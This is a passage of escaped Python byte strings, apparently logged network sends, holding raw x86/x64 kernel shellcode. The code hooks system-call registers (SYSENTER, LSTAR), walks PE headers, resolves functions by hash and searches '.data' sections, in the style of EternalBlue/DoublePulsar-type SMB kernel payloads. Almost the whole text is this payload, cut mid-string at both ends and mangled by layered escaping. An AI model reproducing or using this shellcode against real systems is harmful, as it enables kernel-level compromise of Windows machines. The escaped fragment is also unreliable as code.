\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', \"('send', 3, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\